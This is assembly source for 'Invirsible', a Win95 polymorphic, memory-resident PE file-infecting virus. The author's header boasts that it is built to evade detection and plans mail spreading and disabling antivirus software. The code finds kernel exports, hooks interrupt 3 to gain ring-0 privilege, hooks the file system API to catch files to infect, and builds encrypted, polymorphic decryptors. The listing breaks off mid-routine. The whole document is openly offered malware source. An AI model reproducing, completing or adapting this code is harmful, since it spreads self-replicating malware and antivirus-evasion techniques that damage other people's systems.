; Win95.Invirsible
; Bhunji
;
; proudly presents ;)
;
; Invirsible
;
; Virusinfo
; Version 2
; Size: Big, usually around 7.6k
; Infects: PE files
; Resident: Yes
; Systems: Win9x
; Polymorphic: Yes
; This is the second version of Invirsible. My goal with this virus
; is to make it as hard as possible to detect. It has one technique
; never seen in a virus before which I call the Guide technique. More
; info about this can be found at www.shadowvx.org. It carries a very
; advanced generic polymorpher. It is able to polymorph mov, add, sub
; so far but its trivial to add more instructions. The engine uses
; emulation to generate code. It is able to emulate memory and registers
; which results in code that looks very real. Coding new code to be
; polymorphed is pretty easy as it's similar to Intel asm.
; ex. mov RX1,[RX2]
; mov Random register 1, [Random register 2]
; Changes since last version
; A total rewrite of the polymorphic code. Works way better now.
; * Changed the polymorphic language to be more similar to Intel asm
; * Added memory emulation, the created code uses the end of .data segment.
; * Deleted advanced register emulation, did hardly create better code
; and was taking up lots of space.
; * Very generic, adding a new instruction needs 10 lines of data/code
; instead of 200-400 lines.
; * An optimiser that deletes the very worst code. (fx. mov eax,eax)
; * The linked list polymorpher will create a six different looking
; decryptors for the generic polymorpher.
; Some changes to the virus
; * Bugfixes. (Doesn't crash on infection :) )
; * Search for slackspace in .data segment. This space is used by the
; generated code to look more like real code.
; * Recompilation of the code before every infection to make the pointers
; point to the .data slack
; Things to be added in the future.
; * More instructions will be added to the polymorpher
; * A more powerful optimiser
; * Infect on NT too.
; * Spreading by mail
; * Infection of hlp files
; * EPO
; * Deregister the most common AV software on file but register it later in
; memory. This will not happen if the AV gives the virus its proper name.
; * A better method of upgrading the virus ala babylonia.
; And here is an example of what code the engine is able and has been
; able to generate.
; Version 1
; Version one is able to emulate/generate
; add, mov
;
; (code is taken from a generated Guide)
; mov ecx, 0Ch
; mov ebx, fs:[ecx] ; get random number
; mov edx, 0
; add edx, eax
; add eax, esi
; mov edi, 0
; add edi, 6472DAADh
; mov eax, 5A97451Fh
; mov eax, edx
; add edi, ecx
; mov ecx, 0
; add ecx, ebx
; or ecx, 8
; xor ebx, ecx ; 'and' ebx,8
; add edi, 0DCA7B4AAh
; add edi, 60E4CB5Ch
; mov edi, ebx
; add ebx, offset jumptable ; add ebx, offset jumptable
; jmp dword ptr [ebx]
; patterns
; Differences from the trash code
; fs:[register]
; or/and register,8
; jmp [register]
; The trashcode
; very few instructions
; no memory instructions
; the same amount of every emulateable instruction (normal code has more
; movs then adds for example)
; unnecessary instructions. Ex.
; mov eax, 5A97451Fh ; this is unnecessary
; mov eax, edx ; as this overwrites eax again
; Version 2
; Version two is able to emulate
; add, sub, mov, and, or, xor and memory
; Generates on average more movs then the
; adds and more adds then the other opcodes.
; Generates more registers then memory operands and
; more memory operands then numbers.
; The end result 'feels' more like regular code.
; Many many bugfixes. (There are no more bugs i hope)
; Code is taken from a generated decryptor
;
; mov edx, 8D403766h
; xor [4030D7], 1A45h ; 1a45 = virussize
; xor esi, [4030CF]
; mov [4030CF], ecx
; mov esi, 45BBA054h
; add edi, 0CCFC6B5Bh
; mov ebx, 1A45h ; first "real" instruction
; mov eax, [4030CF]
; sub edi, 1A45h
; or eax, ebx
; mov edi, 1A45h
; mov edi, 3
; add ecx, 3
; mov edx, [4030BF] ; second
; add [4030D7], eax
; mov esi, 3
; DecryptLoop:
; pusha ; will be deleted in future versions
; mov eax, 1FF5893Dh
; mov ecx, ebx
; sub eax, 0E138ABECh
; add edx, ecx ; third
; mov esi, ecx
; mov edi, ebx
; mov eax, 0D6E7BEF5h
; mov [4030CF], 5493B89Ch
; sub ecx, [4030B3]
; mov eax, 0E138ABECh
; and [4030D3], ecx
; or eax, ebx
; xor [edx], 0E138ABECh ; decrypt code
; mov [4030D7], 0E138ABECh
; popa
; sub ebx, 4 ;
; jnb DecryptLoop
; mov dword_0_4030CF, 69472C81h
; mov ecx, 0F5D970C4h
; mov edi, 1
; mov eax, dword_0_4030B7
; add ecx, 8244076Eh
; If we put the real code pieces together we get.
;
; mov ebx, 1A45h ; VirusSize
; mov edx, [4030BF] ; Where to start decrypt
; DecryptLoop:
; add edx, ecx ; third
; xor dword ptr [edx], 0E138ABECh ; decrypt code
; sub ebx, 4 ;
; jnb DecryptLoop
; The third instruction should add "Where to start" with "VirusSize" but
; as you can see it is added with ecx instead, this is because of the
; emulation. The engine knows that ecx = ebx = VirusSize so it used ecx
; instead.
; patterns
; Differences from the trash code
; pushad/popad ; easy to delete
; [Register] ; engine is only able to create [Number]
; jxx ; Engine isnt able to create jumps yet
; The trashcode
; Still to few instructions, needs push/pop, call, jmp, jxx to look at least
; something like real code.
; Memory instructions isn't able to create memory pointers with a register
; inside, eg [Number+register]. A better compiler will fix this.
; Still unnecessary instructions. Ex.
; mov eax, 0D6E7BEF5h ; this is unnecessary
; ...
; mov eax, 1FF5893Dh ; as this overwrites eax again
;
; Greetings
; (M)asmodeus. Dropper.exe has generated errors and will be closed by
; Windows :)))
; Morphi Hoppas att du får det bättre i helsingborg
; Prizzy Thanks for helping me with the bug
; Ruzz Yes, i have FINALY finished it :)
; Kamaileon. I wish you luck with the windows programming.
; Clau Hello sister ;)
; Urgo32 Good luck with your next virus.
includelib kernel32.lib
includelib user32.lib
include c:masmincludewindows.inc
.486
.model flat, stdcall
ExitProcess PROTO ,:DWORD
MessageBoxA PROTO ,:DWORD,:DWORD,:DWORD,:DWORD
; Primes, used them in the first version for advanced register emulation,
; might be useful in the future
Prime1 equ 2
Prime2 equ 3
Prime3 equ 5
Prime4 equ 7
Prime5 equ 11
Prime6 equ 13
Prime7 equ 17
Prime8 equ 19
Prime9 equ 23
Prime10 equ 29
Prime11 equ 31
Prime12 equ 37
Prime13 equ 41
Prime14 equ 43
Prime15 equ 47
Prime16 equ 53
Prime17 equ 59
Prime18 equ 61
Prime19 equ 67
Prime20 equ 71
Prime21 equ 73
Prime22 equ 77
.data
VirusStr db "No crack found",0
.code
; ProgramMain: entry point of the dummy host program in this listing.
; It does nothing except terminate the process with exit code 0.
ProgramMain:
push 0 ; uExitCode = 0
call ExitProcess ; does not return
_rsrc segment para public 'DATA' use32
assume cs:_rsrc
VirusStart:
Main:
mov ebx,[esp]
push ebp
call GetDelta
GetDelta:
pop ebp
sub ebp,offset GetDelta ; address
mov [Temp+ebp],ebx ; save offset into kernel
.if ebp!=0 ; code that isn't
; executed in the first
; version
mov eax,[eax] ; polymorphic code will
mov [InfectedProgramOffset+ebp],eax ; move pointer to
.endif ; programstart in eax
lea eax,BreakPoint1
lea eax,[ebp+GetDelta] ; move some address to
mov [PointerToDataSlack+ebp],eax ; PTDS, doesnt matter as
; long as its a working one
; mov eax,fs:[0c]
db 67h,64h,0a1h,0ch,00h ; get random number
add [RandomNumber+ebp],eax ; (is not random on NT)
call GetAPIFunctions ; Get needed API functions
call FixTables ; clean the 'dirty' tables
; and allocate mem for the
; polymorpher
call CreateGuideAndDecryptor ; Generate the polymorphic
; code
call GetResident ; intercept IFSMgr to get
; filenames to infect
ReturnToHost:
push [MemPtr+ebp] ; free allocated mem used
call [LocalFree+ebp] ; by polymorpher
mov eax,[InfectedProgramOffset+ebp] ; program address
pop ebp ; restore ebp
jmp eax ; jmp to program
Topic db "You can not find what you can not see.",0
db "Invirsible by Bhunji (Shadow VX)",0
VSize equ VirusEnd-VirusStart
VirusSize equ VSize
; how much stack and mem should the polymorpher use
NumberOfOffsets equ 10 ; more size = better code
; (doesnt matter right now
; because the engine isnt
; able to create jumps)
StackSize equ 100 ; (doesnt matter right now
; because the engine isnt
; able to emulate the stack)
MemorySize equ 10 ; The more size the better
; code is produced but makes
; it harder to find a file to
; infect
LinesOfTrash equ 3 ; LinesOfTrash is the
; approximate number of
; random instructions between
; every "legal" instruction
; LinesOfTrash
; Fixup instruction
; LinesOfTrash
EndValueFrecuency equ 1 ; the higher the more often
; is the EndValue chosen
; the higher the number is
; the harder is it to detect
; by looking at one
; instruction, but its easier
; to detect by looking at many
; instructions.
; 1 is a perfect value
MemPtr dd 0 ; ptr to allocated mem
ReturnAddress dd 0 ; stores the return address
; in some functions
InfectedProgramOffset dd ProgramMain ; where to jump when
; done
Temp dd 0 ; just a temporary variable
; API's the virus uses
WinFunctions:
lstrlenStr db "lstrlen",0
LocalAllocStr db "LocalAlloc",0
LocalFreeStr db "LocalFree",0
db 0
; pointers to these
Functions:
lstrlen dd ?
AllocMem dd ?
LocalFree dd ?
FixTables:
lea edi,[ZeroRegStart+ebp]
mov ecx,(ZeroRegEnd-ZeroRegStart)/4
xor eax,eax
rep stosd
lea edi,[RandomRegs+ebp]
mov ecx,Registers
dec eax
rep stosd
lea edi,[SavedOffsets+ebp]
mov ecx,NumberOfOffsets
rep stosd
lea eax,[EaxTable+ebp]
mov [Tables+ebp],eax
mov eax,MemorySize*20+StackSize*20
push eax
push LMEM_FIXED + LMEM_ZEROINIT
call [AllocMem+ebp]
mov [Tables+ebp+4],eax
add eax,MemorySize*20
mov [Tables+ebp+8],eax
call UndefineRegistersAndMem
xor eax,eax
lea esi,[Mem1Table+ebp]
mov edi,[Tables+ebp+4]
lodsb
mov ecx,eax
PredefinedMem:
lodsb
push edi
imul eax,eax,20
lea edi,[edi+eax]
push ecx
mov ecx,5
rep movsd
pop ecx
pop edi
loop PredefinedMem
ret
UndefineRegistersAndMem:
lea edi,[EaxTable+ebp+4*4]
mov ecx,Registers
mov eax,Writeable+Undefined
SetOpcodeInfo1:
stosd
add edi,4*4
loop SetOpcodeInfo1
mov edi,[Tables+ebp+4]
add edi,4*4
mov ecx,MemorySize+StackSize
mov eax,Writeable+Undefined
SetOpcodeInfo2:
stosd
add edi,4*4
loop SetOpcodeInfo2
ret
GetModuleHandle dd 0
GetProcAddress dd 0
GetProcAddressStr db "GetProcAddress",0
GetAPIFunctions:
mov eax,[Temp+ebp]
call GetModuleHandleAndProcAddress
mov [GetModuleHandle+ebp],eax
mov [GetProcAddress+ebp],ebx
xor edx,edx
lea edx,[WinFunctions+ebp]
xor ecx,ecx
CopyWinApiFunctions:
push edx
push ecx
push edx
push edx
push [GetModuleHandle+ebp]
call [GetProcAddress+ebp]
mov ecx,[esp+4]
mov [Functions+ebp+ecx],eax
call [lstrlen+ebp]
pop ecx
pop edx
add edx,eax
add ecx,4
inc edx
cmp byte ptr [edx],0
jnz CopyWinApiFunctions
NoMoreApis:
ret
; Input
; eax = somewhere in kernel
; Returns
; eax = GetModuleHandler offset
; ebx = GetProcAddress offset
GetModuleHandleAndProcAddress:
and eax,0fffff000h ; even 1000h something
FindKernelEntry:
sub eax,1000h
cmp word ptr [eax],'ZM'
jnz FindKernelEntry
mov ebx,[eax+3ch]
cmp word ptr [ebx+eax], 'EP'
jne FindKernelEntry
mov ebx,[eax+120+ebx]
add ebx,eax ; ebx -> Export table
mov ecx,[ebx+12] ; ecx -> dll name
cmp dword ptr [ecx+eax],'NREK'
jz FindGetProcAddress
jmp FindKernelEntry
; We can now be sure that eax points to the kernel
FindGetProcAddress:
lea edi,[GetProcAddressStr+ebp]
mov edx,[ebx+32]
FindFunction:
add edx,4
mov ecx,15 ; length of GetProcAddress,0
mov esi,[edx+eax]
push edi
add esi,eax
repz cmpsb
pop edi
jne FindFunction
sub edx,[ebx+32]
shr edx,1 ; ecx = ordinal pointer
lea esi,[edx+eax]
xor ecx,ecx
add esi,[ebx+36] ; esi = base+ordinals+ordnr
mov cx,word ptr [esi] ; ecx = ordinal
shl ecx,2 ; ecx = ordinal*4
add ecx,[ebx+28] ; ecx = ordinal*4+func tbl addr
mov ebx,[ecx+eax] ; esi = function addr in file
add ebx,eax ; esi = function addr in mem
ret
Encryptor dd 0
GetResident:
mov eax,[GetModuleHandle+ebp]
add eax,6ch
mov ebx,'.K3Y'
cmp [eax],ebx
jz DontGoRing0
sub esp,8
sidt [esp] ; get interupt table
; hook int 3 to get get ring 0
mov esi,[esp+2]
add esi, 3*8 ; pointer to int 3
mov ebx, [esi+4]
mov bx,word ptr [esi] ; ebx = old pointer
lea eax,[Ring0Code+ebp] ; eax = new pointer
mov word ptr [esi],ax ; move new pointer to int 3
shr eax,16
mov word ptr [esi+6], ax
pushad
int 3 ; get into ring 0
popad
mov [esi],bx ; return old pointer again
shr ebx,16
mov [esi+6],bx
add esp,8
DontGoRing0:
ret
; ---------------------------------------
; -------------------------------- Ring 0
; ---------------------------------------
Ring0Code:
mov eax,[GetModuleHandle+ebp]
add eax,6ch
mov ebx,'.K3Y'
mov [eax],ebx
mov ebx,[eax+8]
mov [eax+4],ebx
mov eax,[MemoryTable+ebp]
sub eax,[GuidePos+ebp]
push eax
add eax,(MemorySize+1)*8
push eax ; push guide + decrypt size
; + special variables
add eax,(VirusEnd-VirusStart)*2+20
; allocate mem
push eax
push R0_AllocMem
mov edi,ebp
call vxd
pop ecx
test eax,eax
jz ErrorRing0
; Copy guide and decryptor to ring 0 mem
pop ecx ; ecx = guide + decrypt size
; + special variables
mov esi,[GuidePos+ebp]
mov edi,eax
mov ebx,eax
xchg ebx,[GuidePos+ebp] ; eax = new guide pos
; ebx = old guide pos
pop edx ; edx = size of guide+decrypt
add edx,eax ; edx = new memory pos
mov [MemoryTable+ebp],edx
sub eax,ebx ; difference in mem
add [DecryptorPos+ebp],eax ; add to get new pos
rep movsb ; copy polycode to ring 0
mov edi,edx
mov ecx,(MemorySize+1)*(8/4)
xor eax,eax
rep stosd
add edx,MemorySize*4+4
mov [VirtualDataSegment+ebp],edx
pushad
mov eax,[VirtualDataSegment+ebp] ; pointer to virtual data
; segment
lea edx,[Mem1Table+ebp]
movzx ecx,byte ptr [edx] ; how much data does the
; decryptor and guide need
; predefined
inc edx
CopyDataToVirtualDataSegment:
movzx ebx,byte ptr [edx] ; where in datasegment should
; we write the data
shl ebx,2
push dword ptr [edx+1] ; push the data to write
pop [eax+ebx] ; write it to virtual data seg
add edx,1+5*4 ; point to next data block
loop CopyDataToVirtualDataSegment
popad
mov [VirusInRing0Mem+ebp],edi
mov ebx,edi
lea esi, [ebp+VirusStart]
mov ecx, VirusSize
rep movsb ; copy virus to ring 0
xor eax,eax
stosd
stosd
; encrypt virus in memory
pushad
mov esi,[Encryptor+ebp]
push ebx ; pointer to virus in ring0
mov eax,esp
push eax ; pointer to pointer
push eax
push eax
push eax
mov [PointerToDataSlack+ebp],esp ; all special variables
; points to pointer to
; virus in ring 0
call Compile
call esi
add esp,5*4
popad
; copy residentcode to mem
push edi
lea esi, [ebp+ResidentcodeStart]
mov ecx, ResidentcodeEnd-ResidentcodeStart
rep movsb
; hook API function
; edi is on stack
push InstallFileSystemAPIhook
mov edi,ebp
call vxd
pop edi ; 0 edi left on stack
sub edi,ResidentcodeStart
mov [edi+BasePtr+1],edi
mov [edi+OldAPIFunction],eax
BreakPoint1:
lea eax,[edi+BreakPoint]
lea eax,[edi+BreakPoint]
iretd
ErrorRing0:
pop eax
xor eax,eax
iretd
CreateGuideAndDecryptor:
push 1024*1024
push LMEM_FIXED + LMEM_ZEROINIT
call [AllocMem+ebp]
mov [MemPtr+ebp],eax
mov edi,eax
lea esi,[Guide+ebp]
call LinkedListPolymorpher
call Polymorph ; create Guide
mov [GuidePos+ebp],esi
mov [GuideSize+ebp],eax
add edi,32
lea esi,[Decryptor+ebp]
call LinkedListPolymorpher
push esi
call Polymorph ; create Decryptor
mov [DecryptorPos+ebp],esi
mov [MemoryTable+ebp],edi
mov [DecryptorSize+ebp],eax
call UndefineRegistersAndMem
mov [HowMuchTrash+ebp],0
pop esi
pushad
mov edi,esi
mov eax,Op_trash
bswap eax
xor ecx,ecx
xor edx,edx
FindTrashInstruction:
inc edi
cmp [edi],edx
jz EndOfTrashInstructions
xor ecx,ecx
cmp [edi],eax
jnz FindTrashInstruction
add edi,4
push eax
xor eax,eax
stosb
pop eax
jmp FindTrashInstruction
EndOfTrashInstructions:
test ecx,ecx
jnz ReallyEnd
inc ecx
add edi,3
jmp FindTrashInstruction
ReallyEnd:
popad
add edi,eax
call MutateCode ; Generic polymorphing
mov ecx,edi
sub ecx,esi
shr ecx,1
mov edi,esi
FindDecryptInstruction:
mov eax,'R['
repnz scasw ; find [R
inc edi
mov ax,word ptr [edi]
cmp eax,',]' ; is this [Rx],
jnz FindDecryptInstruction ; if not, continue looking
and edi,0fffffff0h
mov eax,[edi]
bswap eax
.if eax==Op_xor
jmp CompileEncryptor
.elseif eax==Op_add
mov eax,Op_sub
bswap eax
stosd
jmp CompileEncryptor
.else
mov eax,Op_add
bswap eax
stosd
jmp CompileEncryptor
.endif
CompileEncryptor:
mov [Encryptor+ebp],esi
ret
; ---------------------------------------------------
; --------------------------- The generic polymorpher
; ---------------------------------------------------
; esi = Data to polymorph
; edi = where to put the created data
; Returns
; esi = start of created data
; edi = end of created data/start of created code
; eax = size of the created code
; Defined opcode looks
Op_add equ 'add '
Op_and equ 'and '
Op_mov equ 'mov '
Op_or equ 'or '
Op_sub equ 'sub '
Op_xor equ 'xor '
Op_cmp equ 'cmp '
Op_jnz equ 'jnz '
Op_jnb equ 'jnb '
Op_jna equ 'jna '
Op_jmp equ 'jmp '
Op_offset equ 'ofs '
Op_db equ 'db ' ; output whats in there,
; dont polymorph,
; dont compile
Op_dontparse equ '!emu' ; dont polymorph only
; compile
; special opcodes
Op_encrypt equ 'cpt ' ; encrypt this operand,
; used to create encryptor/
; decryptor
Op_setinfo equ 'nfo ' ; set info of operand
; used to define a operand
; changable or similar.
Op_prefix equ 'pfx ' ; prefix, eg fs:, es: and
; similar. Will be deleted
; in future versions
Op_trash equ 'trsh' ; how mush trash to be
; produced, use wisely
; to make your code better
; or when you need to save
; the flags
LinkedListPolymorpher:
call TablePolymorpher ; 'old' style polymorphics
; esi -> created data
; edi -> created data+sizeof (created data)+1
ret
Polymorph:
add edi,16
and edi,0fffffff0h
push edi
push edi
call MutateCode ; Generic polymorphing
pop edi
; esi -> created data
call Optimize ; Optimize the created code
; esi -> created data
; edi -> created data+sizeof (created data)+1
push edi
call Compile ; compile the code to get
; the size
pop edi
pop esi
ret
Regs equ 6
Registers equ Regs
InfoPtr equ 16
; This polymorpher is a bit different from the usual one.
; It's able to create code that does different things, not just
; the same with a different look.
TablePolymorpher:
; A nice recursive function :)
xor eax,eax
xor ecx,ecx
push edi
push 0
ReadInstruction: ; 'execute' function
mov cl, byte ptr [esi] ; How many bytes to output
inc esi
rep movsb
ParseCall: ; end of this function,
; should we call an other
lodsb
test eax,eax
jz ReturnFromCall ; no, return
lea ebx,[esi+eax*4]
push ebx ; push return address
call Random
mov esi,[esi+eax*4] ; address of the function
add esi,ebp
jmp ReadInstruction ; jmp to function 'executer'
ReturnFromCall:
pop esi ; return from main function
test esi,esi
jnz ParseCall
NoMoreParsing:
xor eax,eax
stosd
stosd
pop esi
ret
Decryptor:
db 0
db 1
dd R0VSize
; dd R0Zero
db 1
dd MovePoinerToProgramStart
db 0
MovePoinerToProgramStart:
db MovePoinerToProgramStartEnd-$-1
db "trsh",LinesOfTrash
db "mov R1,[N"
dd 1
db "]"
MovePoinerToProgramStartEnd:
db 0
R0VSize:
db R0VSizeEnd-$-1
db "mov RX0,N"
dd VSize
R0VSizeEnd:
db 2
dd R1VirusStart
dd R1VirusEnd
db 1
dd EncryptRX1
db 1
dd SubR0AndJump
db 0
SubR0AndJump:
db SubR0AndJumpEnd-$-1
db "db ",1 ; Bytes not to be morphed
popad
db "trsh",0
db "sub RX0,N"
dd 4
db "!emu",9 ; dont do anything about this
db "jnb N"
dd 0
SubR0AndJumpEnd:
db 0
R0Zero:
db R0ZeroEnd-$-1
db "mov RX0,N"
dd 0
R0ZeroEnd:
db 2
dd R1VirusStart
dd R1VirusEnd
db 1
dd EncryptRX1
db 1
dd AddR0AndJump
db 0
AddR0AndJump:
db AddR0AndJumpEnd-$-1
db "db ",1 ; Bytes not to be morphed
popad
db "add RX0,N"
dd 4
db "trsh",0
db "!emu",13 ; dont do anything about this
db "cmp RX0,N"
dd VSize
db "!emu",9 ; dont do anything about this
db "jna N"
dd 0
AddR0AndJumpEnd:
db 0
R1VirusStart:
db R1VirusStartEnd-$-1
db "mov RX1,[N"
dd 3
db "]"
db "ofs 0"
db "db ",1
pushad
db "nfo RX2"
dd Undefined
db "add RX1,RX0"
R1VirusStartEnd:
db 0
R1VirusEnd:
db R1VirusEndEnd-$-1
db "mov RX1,[N"
dd 3
db "]"
db "add RX1,N"
dd VSize
db "ofs 0"
db "db ",1
pushad
db "nfo RX2"
dd Undefined
db "sub RX1,RX0"
R1VirusEndEnd:
db 0
EncryptRX1:
db 0
db 1
dd RandomReg
db 0
OpcodeXor:
db 4
db "xor "
db 0
OpcodeAdd:
db 4
db "add "
db 0
OpcodeSub:
db 4
db "sub "
db 0
RandomReg:
db 0
db 1
dd RandomOpcode
db 1
dd RandomizeMemWithReg
db 0
RandomizeMemWithReg:
db RandomizeMemWithRegEnd-$-1
db "[RX1],N"
RandomNumber dd 0
RandomizeMemWithRegEnd:
db 0
RandomOpcode:
db 0
db 3
dd OpcodeXor
dd OpcodeAdd
dd OpcodeSub
db 0
Guide:
db DefinedTrash-$-1
db "trsh",LinesOfTrash
DefinedTrash:
db 1
; dd RandomEveryBoot
dd RandomEveryTime
db 1
dd MakeZeroOrEight
db 0
RandomEveryTime:
db RandomEveryTimeEnd-$-1
db "pfx ",64h ; prefix fs:
db "mov RX0,[N"
dd PointerToRandomMemory
db "]" ; mov X0, fs:[0ch]
RandomEveryTimeEnd:
db 0
RandomEveryBoot:
db RandomEveryBootEnd-$-1
db "nfo R"
RandomEveryBootEnd:
db 3
dd RndEcx
dd RndEdi
dd RndEsi
db 0
RndEcx:
db RndEcxEnd-$-1
db "3"
dd Undefined
db "mov RX0,R3"
RndEcxEnd:
db 0
RndEdi:
db RndEdiEnd-$-1
db "5"
dd Undefined
db "mov RX0,R5"
RndEdiEnd:
db 0
RndEsi:
db RndEsiEnd-$-1
db "6"
dd Undefined
db "mov RX0,R6"
RndEsiEnd:
db 0
MakeZeroOrEight:
db MakeZeroOrEight-$-1
db "and RX0,N"
dd 8
db "add RX0,[N" ; special variable 1 =
dd 1 ; pointer to jump table
db "]"
db "jmp [RX0]" ; jmp [X0]
MakeZeroOrEightEnd:
db 0
; ---------------------------------------------
; ---------------- MutateCode -----------------
; ---------------------------------------------
; ------------- Local variables
Prefix dd 0
EndWhere:
Trash dd 0
ToReg dd 0
ToMemValue dd 0
ToMemReg dd 0
FromWhere:
FromValue dd 0
FromReg dd 0
FromMemValue dd 0
FromMemReg dd 0
TempWhere:
TempValue dd 0
TempReg dd 0
TestMemValue dd 0
TestMemReg dd 0
Temp1 dd 0
Temp2 dd 0
Writeable equ 1b
Undefined equ 10b ; is has a unknown value
Uninitialized equ -1
TableSize equ EbxTable-EaxTable
EndValue dd 0
EndTypeOfValue dd 0
Tables: ; pointers to the different
; tables
RegTables dd EaxTable
MemoryTables dd 0 ; Is allocated later
StackTables dd 0 ; first table is EspTable
EaxTable:
EaxValueNumber dd 0
EaxValueReg dd 0
EaxMemoryNumber dd 0
EaxMemoryReg dd 0
EaxInformation dd Undefined+Writeable
EbxTable:
dd 0,0,0,0, Undefined+Writeable
EcxTable:
dd 0,0,0,0, Undefined+Writeable
EdxTable:
dd 0,0,0,0, Undefined+Writeable
EsiTable:
dd 0,0,0,0, Undefined+Writeable
EdiTable:
dd 0,0,0,0, Undefined+Writeable
; this table is copied to mem, its used to define
; starting values for the memory
; Undefined mem start as Undefined+Writeable (you could change this to
; only writable for slightly better code.)
Mem1Table:
db 4 ; how many tables
db 0 ; which table
dd 0,0,0,0, Undefined ; program entry point
db 1
dd 0,0,0,0, Undefined ; pointer to mem 0
db 2
dd 0,0,0,0, Undefined ; decryptor entry point
db 3
dd 0,0,0,0, Undefined ; where to start decrypt
RandomRegs:
dd Registers dup (-1) ; Random Regs
; mutates the code in esi and places the result in edi
; returns a pointer to the created code in esi
; returns a pointer to the created code + sizeof(created code) in edi
MutateCode:
push edi
MorphCodeLoop:
xor eax,eax
dec eax
push edi
lea edi,[ebp+EndWhere]
mov ecx,8
rep stosd
pop edi
call Parse
jmp MorphCodeLoop
MutateEnd:
pop eax ; return address of Parse
pop esi
add esi,16
and esi,0fffffff0h
add edi,10
ret
; ----------------------- Parser
ParseSpecialVariables:
dd (ParseSpecialVariablesEnd-ParseSpecialVariables-4)/4+1
dd Op_db, Op_encrypt, Op_setinfo, Op_offset, Op_prefix
dd Op_trash,Op_dontparse,Op_jmp
ParseSpecialVariablesEnd:
ParseSpecialProcedures:
dd ParseDeclareByte, ParseEncrypt, ParseChangeInfo
dd ParseSaveOffset, ParsePrefix, ParseTrash, ParseDontParse
dd TemporaryParseJump
ParseSpecialProceduresEnd:
ParseInstructionData:
dd (ParseInstructionDataEnd-ParseInstructionData-4)/4+1
dd Op_add, Op_mov, Op_sub, Op_or, Op_xor, Op_and
ParseInstructionDataEnd:
AddPos equ 0
MovPos equ 1
SubPos equ 2
OrPos equ 3
XorPos equ 4
AndPos equ 5
InstructionData:
AddInfo:
dd offset AddInstruction
dd Op_add
MovInfo:
dd offset MovInstruction
dd Op_mov
SubInfo:
dd offset SubInstruction
dd Op_sub
OrInfo:
dd offset OrInstruction
dd Op_or
XorInfo:
dd offset XorInstruction
dd Op_xor
AndInfo:
dd offset AndInstruction
dd Op_and
InstuctionTablesEnd:
Parse:
push edi
mov ecx,[ParseSpecialVariables+ebp]
lea edi,[ParseSpecialVariables+ebp+4]
lodsd
bswap eax
repnz scasd
test ecx,ecx
jz ParseInstruction
pop edi
lea ebx,[ParseSpecialProceduresEnd+ebp]
imul ecx,ecx,4
sub ebx,ecx
mov ebx,[ebx]
add ebx,ebp
jmp ebx
ParseDeclareByte:
mov edx,Op_db
call OutputOnlyOpcode
xor eax,eax
lodsb
mov ecx,eax
stosb ; number of bytes to declare
rep movsb
ret
ParseEncrypt:
call GetOperand
ret
ParseChangeInfo:
mov eax,666666h
call GetOperand
mov ecx,eax
lodsd
xchg eax,ecx
call ChangeInfo
ret
ParseSaveOffset:
mov edx,Op_offset
call OutputOnlyOpcode
movsb
ret
ParsePrefix:
xor eax,eax
lodsb
mov [Prefix+ebp],eax
ret
ParseTrash:
xor eax,eax
lodsb
mov [HowMuchTrash+ebp],eax
ret
ParseDontParse:
xor eax,eax
lodsb
mov ecx,eax
add edi,16
and edi,0fffffff0h
rep movsb
ret
TemporaryParseJump:
add edi,16
and edi,0fffffff0h
call OutputPrefix
mov eax,Op_jmp
bswap eax
stosd
call GetOperand
add eax,'0'
add eax,']'*256
shl eax,16
mov ax,'R['
stosd
ret
ParseInstruction:
mov ecx,[ParseInstructionData+ebp]
lea edi,[ParseInstructionData+ebp+4]
repnz scasd
pop edi
test ecx,ecx
jz MutateEnd
lea ebx,[InstuctionTablesEnd+ebp]
imul ecx,ecx,8
sub ebx,ecx
push ebx
ParseOperands:
call GetOperand
sub ebx,4
push ebx ; ToType
push eax ; ToOperand
inc esi
call GetOperand
push ebx ; FromTypeOfValue
push eax ; FromOperand
mov [EndValue+ebp],eax
mov [EndTypeOfValue+ebp],ebx
call GenerateTrash
mov eax,[esp+8] ; ToOperand
mov ebx,[esp+12] ; ToType
mov ecx,Writeable
call DeleteFromInfo
pop [FromOperand+ebp]
pop [FromTypeOfValue+ebp]
pop eax
pop ebx
mov [ToOperand+ebp],eax
mov [ToType+ebp],ebx
mov ecx,Writeable
call DeleteFromInfo
pop [EmulateInstruction+ebp]
call OutputPrefix
call EmuProc
call GenerateTrash
ret
; return
; eax = register or number
; ebx =
; 0 = value/number
; 4 = value/register
; 8 = memory/number
; 12 = memory/register
; return
; EBX = 0 if value and 4 if memory
; |'V' or 'M'
; |
; db "M"
ReadTypeOfData:
xor eax,eax
xor ebx,ebx
lodsb
cmp al,'M'
sete bl
shl bl,3
ret
; return
; EAX = the number or register
; EBX = 0 if number and 4 if register
; This procedure is in the "copy to ring 0" mem.
;GetOperand:
; xor edx,edx
; mov al,byte ptr [esi]
; cmp al,'['
; setz dl
; mov ecx,edx
; add esi,edx
; shl edx,3
; mov ebx,edx ; ebx = 0 or 8
; lodsb
; cmp al,'S' ; A variable
; jnz Label53
; mov eax,[PointerToDataSlack+ebp]
; mov edx,[esi]
; mov eax,[eax+edx*4]
; mov [esi],eax
; mov eax,'V'
; xor edx,edx
;
; Label53:
; cmp al,'R'
; setz dl
; shl edx,2
; add ebx,edx ; ebx = ebx + (0 or 4)
;
; test edx,edx ; is value
; jz ReadValue
;
; xor eax,eax
; lodsb ; read register
; cmp al,'X'
; jz GetRandomReg
; sub eax,'0'
; add esi,ecx
; ret
; ReadValue:
; lodsd
; add esi,ecx
; ret
GetRandomReg:
push ebx
call AsciiToNum
add esi,ecx
shl eax, 2
lea eax,[eax+ebp+RandomRegs] ; eax -> RandomReg
mov ebx,[eax]
cmp ebx,Uninitialized
jz GetRandomRegPtrInitialize ; There is no RnR
; Xx, create one
xchg eax,ebx ; eax = Xx
pop ebx
ret
GetRandomRegPtrInitialize:
push eax
call GetWriteableReg
pop ebx
mov [ebx],eax ; Mov RR,Random Operand
pop ebx
ret
; -----------------------------------------------
; ---------------------------- Generic polymorpher
; -----------------------------------------------
; This proc takes data from WhereFrom and WhereTo and
; creates instructions from that data.
HowMuchTrash dd LinesOfTrash
RandomProcs:
db 6 ; number of instructions
db 6 ; how often it should come up
db 2
db 1
db 1
db 1
db 1
dd MovPos
dd AddPos
dd SubPos
dd OrPos
dd XorPos
dd AndPos
GenerateTrash:
mov eax,[HowMuchTrash+ebp] ; 1/LinesOfTrash that we
; stop creating trash
inc eax
call Random
test eax,eax
jz Return
call GetWriteable
mov [ToOperand+ebp],eax
mov [ToType+ebp],ebx
call RandomOperand
mov [FromOperand+ebp],eax
mov [FromTypeOfValue+ebp],ebx
lea ebx,[RandomProcs+ebp]
xor eax,eax
xor ecx,ecx
